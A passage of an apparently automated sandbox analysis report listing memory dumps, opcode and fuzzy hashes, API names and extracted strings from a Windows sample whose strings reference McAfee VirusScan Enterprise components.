                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3916222277
                                  • Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                  • Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
                                  • Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                  • Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  • Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                  • Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
                                  • Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                  • Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: -
                                  • API String ID: 0-2547889144
                                  • Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                  • Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
                                  • Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                  • Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: -
                                  • API String ID: 0-2547889144
                                  • Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                  • Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
                                  • Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                  • Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                  • Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
                                  • Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                  • Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: -
                                  • API String ID: 0-2547889144
                                  • Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                  • Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
                                  • Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                  • Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: -
                                  • API String ID: 0-2547889144
                                  • Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                  • Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
                                  • Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                  • Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: -
                                  • API String ID: 0-2547889144
                                  • Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                  • Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
                                  • Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                  • Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                  • Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
                                  • Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                  • Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                  • Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
                                  • Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                  • Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                  • Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
                                  • Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                  • Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                  • Instruction ID: b5688cd3ff6e8c7daaccd47606d53af13fafc32159c9a8309fdae242c84dfdbc
                                  • Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                  • Instruction Fuzzy Hash: 3EF06271B1A2958AEFA48F28A852A297BD0E7483D0F948439D69D83B14D73CD0709F0C

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 346 1400038d0-140003915 SetWaitableTimer 347 140003925-140003947 346->347 348 140003917-140003924 346->348 349 140003949-140003969 #4 347->349 350 140003970-14000397a 347->350 349->350 351 140003992-1400039d3 EnterCriticalSection LeaveCriticalSection WaitForMultipleObjects 350->351 352 14000397c-14000398d #4 350->352 353 140003d32 351->353 354 1400039d9-1400039f1 351->354 352->351 357 140003d35-140003d49 353->357 355 1400039f3-140003a04 #4 354->355 356 140003a09-140003a1a EnterCriticalSection 354->356 355->356 358 140003a67 356->358 359 140003a1c-140003a34 356->359 362 140003a6c-140003a8e LeaveCriticalSection 358->362 360 140003a36 359->360 361 140003a3e-140003a49 359->361 360->361 361->362 363 140003a4b-140003a65 SetEvent ResetEvent 361->363 364 140003ab4-140003abe 362->364 365 140003a90-140003aad #4 362->365 363->362 366 140003ae8-140003af9 364->366 367 140003ac0-140003ae1 #4 364->367 365->364 368 140003afb-140003b26 #4 366->368 369 140003b2d-140003b37 366->369 367->366 368->369 370 140003b61-140003b6b 369->370 371 140003b39-140003b5a #4 369->371 372 140003b6d-140003b98 #4 370->372 373 140003b9f-140003ba9 370->373 371->370 372->373 374 140003bab-140003bd6 #4 373->374 375 140003bdd-140003be7 373->375 374->375 376 140003be9-140003c14 #4 375->376 377 140003c1b-140003c25 375->377 376->377 378 140003c27-140003c48 #4 377->378 379 140003c4f-140003c59 377->379 378->379 380 140003c83-140003c8d 379->380 381 140003c5b-140003c7c #4 379->381 382 140003cb7-140003cc1 380->382 383 140003c8f-140003cb0 #4 380->383 381->380 384 140003cc3-140003ce4 #4 382->384 385 140003ceb-140003cf5 382->385 383->382 384->385 386 140003d11-140003d14 385->386 387 140003cf7-140003d0c #4 385->387 388 140003d17 call 140001750 386->388 387->386 389 140003d1c-140003d1f 388->389 390 140003d21-140003d29 call 140002650 389->390 391 140003d2e-140003d30 389->391 390->391 391->357
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                  • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                  • API String ID: 1021822269-3147033232
                                  • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                  • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
                                  • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                  • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                  • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                  • API String ID: 883923345-381368982
                                  • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                  • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                                  • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                  • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                  • String ID:
                                  • API String ID: 1613947383-0
                                  • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                  • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                                  • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                  • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                  • String ID:
                                  • API String ID: 1995290849-0
                                  • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                  • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                                  • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                  • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                  • String ID:
                                  • API String ID: 1995290849-0
                                  • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                  • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                                  • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                  • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                  • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                  • API String ID: 93015348-1041928032
                                  • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                  • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                                  • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                  • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                  • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                  • API String ID: 3682727354-300733478
                                  • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                  • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                                  • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                  • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                  • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                  • API String ID: 2587151837-1427723692
                                  • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                  • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                                  • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                  • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                  • String ID: SetDllDirectoryW$kernel32.dll
                                  • API String ID: 3184163350-3826188083
                                  • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                  • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
